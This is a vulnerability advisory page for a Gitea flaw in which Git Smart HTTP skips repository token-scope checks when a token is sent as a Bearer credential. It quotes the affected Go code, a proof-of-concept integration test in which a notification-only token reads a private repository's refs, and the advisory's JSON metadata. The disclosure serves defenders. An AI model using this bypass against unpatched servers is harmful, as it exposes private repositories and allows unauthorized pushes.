GHSA-CC8W-R4QH-3V65

Vulnerability from github – Published: 2026-06-16 23:38 – Updated: 2026-06-16 23:38
VLAI?
Summary
Gitea: Git Smart HTTP Skips Repository Token Scopes for Bearer Tokens
Details

Summary

Gitea v1.26.1 enforces repository-scoped access-token permissions on repository operations. In the Git Smart HTTP path, however, this check runs only when the token is presented via HTTP Basic authentication — CheckRepoScopedToken() returns early unless ctx.IsBasicAuth is true — so the same token sent as Authorization: Bearer <token> bypasses the scope check entirely.

As a result, a PAT or OAuth2 token presented as a Bearer credential can clone or fetch private repositories without the read:repository scope, and likewise reach the Git push without write:repository.

Details

Git Smart HTTP routes allow both Basic auth and OAuth2/Bearer auth:

// routers/web/web.go
addOwnerRepoGitHTTPRouters(
    m,
    repo.HTTPGitEnabledHandler,
    webAuth.AllowBasic,
    webAuth.AllowOAuth2,
    repo.CorsHandler(),
    optSignInFromAnyOrigin,
    context.UserAssignmentWeb(),
)

The Git HTTP authorization path calls CheckRepoScopedToken() before falling through to normal repository RBAC:

// routers/web/repo/githttp.go
if askAuth {
    if !ctx.IsSigned {
        ctx.HTTPError(http.StatusUnauthorized)
        return nil
    }

    context.CheckRepoScopedToken(ctx, repo, auth_model.GetScopeLevelFromAccessMode(accessMode))
    if ctx.Written() {
        return nil
    }

    // normal repository RBAC follows
}

However, CheckRepoScopedToken() only enforces token scopes for Basic-authenticated requests:

// services/context/permission.go
func CheckRepoScopedToken(ctx *Context, repo *repo_model.Repository, level auth_model.AccessTokenScopeLevel) {
    if !ctx.IsBasicAuth || ctx.Data["IsApiToken"] != true {
        return
    }

    scope, ok := ctx.Data["ApiTokenScope"].(auth_model.AccessTokenScope)
    if ok {
        requiredScopes := auth_model.GetRequiredScopes(level, auth_model.AccessTokenScopeCategoryRepository)
        // public-only and required repository scope checks follow
    }
}

The Bearer/OAuth2 auth path still records the token scope:

// services/auth/oauth2.go
accessTokenScope, uid := GetOAuthAccessTokenScopeAndUserID(ctx, tokenSHA)
if uid != 0 {
    store.GetData()["IsApiToken"] = true
    store.GetData()["ApiTokenScope"] = accessTokenScope
}

Bearer PATs also set IsApiToken=true and ApiTokenScope, but ctx.IsBasicAuth remains false because the selected auth method is OAuth2/Bearer rather than Basic. The scope is therefore available but ignored.

PoC

This test creates a token for user2 with only read:notification, then requests Git Smart HTTP refs for user2/repo2, which is private. The same token is rejected over Basic auth, but succeeds over Bearer auth.

func TestPOCGitSmartHTTPBearerTokenBypassesRepositoryScope(t *testing.T) {
    defer tests.PrepareTestEnv(t)()

    repo := unittest.AssertExistsAndLoadBean(t, &repo_model.Repository{ID: 2, OwnerName: "user2", Name: "repo2"})
    assert.True(t, repo.IsPrivate)

    session := loginUser(t, "user2")
    token := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopeReadNotification)
    url := "/user2/repo2/info/refs?service=git-upload-pack"

    basicReq := NewRequest(t, "GET", url)
    basicReq.SetBasicAuth(token, "x-oauth-basic")
    MakeRequest(t, basicReq, http.StatusForbidden)

    bearerReq := NewRequest(t, "GET", url).AddTokenAuth(token)
    resp := MakeRequest(t, bearerReq, http.StatusOK)
    assert.Contains(t, resp.Body.String(), "refs/heads/master")
}

Impact

Any Gitea instance exposing Git Smart HTTP is affected when users use PATs or OAuth2 tokens as Bearer tokens. The attacker still needs a token for a user who has normal repository RBAC, so this does not grant access to repositories the token owner could not otherwise access.

The vulnerability breaks the access-token scope boundary. A token intended only for unrelated scopes, such as read:notification, can clone or fetch private repository contents over Git Smart HTTP. The same root cause can affect write flows because git-receive-pack also calls the same repository scope check before normal write RBAC.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.26.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "code.gitea.io/gitea"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.26.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28744"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T23:38:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nGitea v1.26.1 enforces repository-scoped access-token permissions on repository operations. In the Git Smart HTTP path, however, this check runs only when the token is presented via HTTP Basic authentication \u2014 `CheckRepoScopedToken()` returns early unless `ctx.IsBasicAuth` is true \u2014 so the same token sent as `Authorization: Bearer \u003ctoken\u003e` bypasses the scope check entirely.\n\nAs a result, a PAT or OAuth2 token presented as a Bearer credential can clone or fetch private repositories without the `read:repository` scope, and likewise reach the Git push without `write:repository`.\n\n### Details\nGit Smart HTTP routes allow both Basic auth and OAuth2/Bearer auth:\n\n```go\n// routers/web/web.go\naddOwnerRepoGitHTTPRouters(\n\tm,\n\trepo.HTTPGitEnabledHandler,\n\twebAuth.AllowBasic,\n\twebAuth.AllowOAuth2,\n\trepo.CorsHandler(),\n\toptSignInFromAnyOrigin,\n\tcontext.UserAssignmentWeb(),\n)\n```\n\nThe Git HTTP authorization path calls `CheckRepoScopedToken()` before falling through to normal repository RBAC:\n\n```go\n// routers/web/repo/githttp.go\nif askAuth {\n\tif !ctx.IsSigned {\n\t\tctx.HTTPError(http.StatusUnauthorized)\n\t\treturn nil\n\t}\n\n\tcontext.CheckRepoScopedToken(ctx, repo, auth_model.GetScopeLevelFromAccessMode(accessMode))\n\tif ctx.Written() {\n\t\treturn nil\n\t}\n\n\t// normal repository RBAC follows\n}\n```\n\nHowever, `CheckRepoScopedToken()` only enforces token scopes for Basic-authenticated requests:\n\n```go\n// services/context/permission.go\nfunc CheckRepoScopedToken(ctx *Context, repo *repo_model.Repository, level auth_model.AccessTokenScopeLevel) {\n\tif !ctx.IsBasicAuth || ctx.Data[\"IsApiToken\"] != true {\n\t\treturn\n\t}\n\n\tscope, ok := ctx.Data[\"ApiTokenScope\"].(auth_model.AccessTokenScope)\n\tif ok {\n\t\trequiredScopes := auth_model.GetRequiredScopes(level, auth_model.AccessTokenScopeCategoryRepository)\n\t\t// public-only and required repository scope checks follow\n\t}\n}\n```\n\nThe Bearer/OAuth2 auth path still records the token scope:\n\n```go\n// services/auth/oauth2.go\naccessTokenScope, uid := GetOAuthAccessTokenScopeAndUserID(ctx, tokenSHA)\nif uid != 0 {\n\tstore.GetData()[\"IsApiToken\"] = true\n\tstore.GetData()[\"ApiTokenScope\"] = accessTokenScope\n}\n```\n\nBearer PATs also set `IsApiToken=true` and `ApiTokenScope`, but `ctx.IsBasicAuth` remains false because the selected auth method is OAuth2/Bearer rather than Basic. The scope is therefore available but ignored.\n\n### PoC\nThis test creates a token for `user2` with only `read:notification`, then requests Git Smart HTTP refs for `user2/repo2`, which is private. The same token is rejected over Basic auth, but succeeds over Bearer auth.\n\n```go\nfunc TestPOCGitSmartHTTPBearerTokenBypassesRepositoryScope(t *testing.T) {\n\tdefer tests.PrepareTestEnv(t)()\n\n\trepo := unittest.AssertExistsAndLoadBean(t, \u0026repo_model.Repository{ID: 2, OwnerName: \"user2\", Name: \"repo2\"})\n\tassert.True(t, repo.IsPrivate)\n\n\tsession := loginUser(t, \"user2\")\n\ttoken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopeReadNotification)\n\turl := \"/user2/repo2/info/refs?service=git-upload-pack\"\n\n\tbasicReq := NewRequest(t, \"GET\", url)\n\tbasicReq.SetBasicAuth(token, \"x-oauth-basic\")\n\tMakeRequest(t, basicReq, http.StatusForbidden)\n\n\tbearerReq := NewRequest(t, \"GET\", url).AddTokenAuth(token)\n\tresp := MakeRequest(t, bearerReq, http.StatusOK)\n\tassert.Contains(t, resp.Body.String(), \"refs/heads/master\")\n}\n```\n\n### Impact\nAny Gitea instance exposing Git Smart HTTP is affected when users use PATs or OAuth2 tokens as Bearer tokens. The attacker still needs a token for a user who has normal repository RBAC, so this does not grant access to repositories the token owner could not otherwise access.\n\nThe vulnerability breaks the access-token scope boundary. A token intended only for unrelated scopes, such as `read:notification`, can clone or fetch private repository contents over Git Smart HTTP. The same root cause can affect write flows because `git-receive-pack` also calls the same repository scope check before normal write RBAC.",
  "id": "GHSA-cc8w-r4qh-3v65",
  "modified": "2026-06-16T23:38:12Z",
  "published": "2026-06-16T23:38:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-cc8w-r4qh-3v65"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-gitea/gitea"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gitea: Git Smart HTTP Skips Repository Token Scopes for Bearer Tokens"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…